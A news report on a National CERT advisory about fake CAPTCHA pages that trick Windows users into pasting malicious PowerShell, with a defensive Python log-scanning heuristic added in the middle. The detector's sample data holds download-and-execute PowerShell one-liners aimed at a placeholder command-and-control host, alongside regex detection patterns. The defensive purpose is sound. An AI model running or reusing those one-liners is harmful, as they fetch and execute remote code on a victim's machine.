Islamabad, Oct 25: NCERT Warns Fake CAPTCHA Pages Exploit PowerShell Vulnerability to Hack Windows Systems
A cybersecurity advisory has been released by the National Computer Emergency Response Team (National CERT) alerting users to a new malware campaign that uses phony CAPTCHA verification sites to trick users.
Dubbed “Fake CAPTCHA Pages Leveraging PowerShell for Malware Delivery,” the advisory details how cybercriminals are exploiting social engineering techniques to trick users into compromising their systems. The attack has already targeted users within the region, with a specific focus on those seeking free online content.
The advisory states that threat actors lure users to malicious websites that pose as free media platforms and ask them to complete a CAPTCHA verification. Interacting with the bogus CAPTCHA silently copies a malicious script to the user's clipboard, and the user is then deceived into pasting and running it.
The attack relies mainly on PowerShell to infect the victim's computer with further malware, which may include information-stealing tools and network scanners that enable additional exploitation.
The attack begins when users are directed to phony CAPTCHA pages that imitate legitimate verification procedures. When they interact with the CAPTCHA, users unintentionally run malicious PowerShell scripts that download and execute files from an attacker-controlled server. The advisory urges enterprises to watch for and promptly block the malicious URLs and file hashes it lists as key indicators of compromise (IOCs).
According to the National CERT, this campaign gives attackers the ability to install other kinds of malware, including network scanners and infostealers, which facilitate lateral movement within compromised networks. Because malicious PowerShell commands can bypass conventional security controls, businesses are urged to put stronger measures in place, including thorough PowerShell logging and robust endpoint protection.
A number of urgent preventive measures are suggested by the National CERT, including warning users about the dangers of social engineering techniques, especially those that involve copying and pasting unfamiliar commands. Organizations should also enable PowerShell logging to identify unwanted activities and keep an eye on network traffic for any unusual connections.
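The advisory's logging recommendation only pays off if someone reads the logs. The following added example (not code from the National CERT advisory) shows one heuristic a defender could run over PowerShell Script Block Logging (Event ID 4104) records to surface the download-and-execute pattern described above; the sample records, the placeholder domain and the regex indicators are all constructed assumptions, not values from the advisory.

```python
import re

# Constructed sample records in the shape of Script Block Logging entries:
# (record_id, script_text). Hypothetical data; the domain is a placeholder.
SAMPLE_SCRIPT_BLOCKS = [
    (1, "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"),
    (2, "powershell -w hidden -c \"iex (iwr 'http://c2.example.invalid/v.txt').Content\""),
    (3, "Invoke-WebRequest -Uri 'http://c2.example.invalid/setup.exe' -OutFile "
        "$env:TEMP\\s.exe; Start-Process $env:TEMP\\s.exe"),
    (4, "Get-Process | Where-Object CPU -gt 100"),
    (5, "Invoke-WebRequest -Uri 'https://example.invalid/status' | Select-Object StatusCode"),
]

# Heuristic patterns (assumptions, not taken from the advisory) for the two
# stages it describes: fetching from a remote server, then executing the result.
FETCH = re.compile(r"(?i)\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b")
REMOTE_URL = re.compile(r"(?i)\bhttps?://[^\s'\"()]+")
EXEC_IN_MEMORY = re.compile(r"(?i)\b(iex|invoke-expression)\b")
START_DROPPED = re.compile(r"(?i)\b(start-process|saps)\b")
HIDDEN = re.compile(r"(?i)-w(indowstyle)?\s+hidden")


def analyze_block(record_id, script):
    """Return a finding dict for a suspicious script block, or None if benign."""
    fetches = bool(FETCH.search(script) or REMOTE_URL.search(script))
    executes = bool(EXEC_IN_MEMORY.search(script) or START_DROPPED.search(script))
    if not (fetches and executes):
        return None  # a download on its own (e.g. a health check) is not enough
    reasons = ["download-and-execute"]
    if HIDDEN.search(script):
        reasons.append("hidden window")  # typical of pasted one-liners
    return {"record_id": record_id, "reasons": reasons,
            "urls": REMOTE_URL.findall(script)}


def scan_script_blocks(blocks):
    """Run the heuristic over (record_id, script) pairs; return flagged findings."""
    return [f for f in (analyze_block(rid, s) for rid, s in blocks) if f]


if __name__ == "__main__":
    for finding in scan_script_blocks(SAMPLE_SCRIPT_BLOCKS):
        print(finding)
```

The URLs it extracts are what you would check against the advisory's IOC list and your proxy or DNS logs.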
To reduce the risk of these attacks, the advisory recommends deploying endpoint detection and response (EDR) systems, limiting privileged access, and implementing multi-factor authentication (MFA). To prevent further compromise, organizations are also advised to block all of the malicious domains and URLs that have been identified.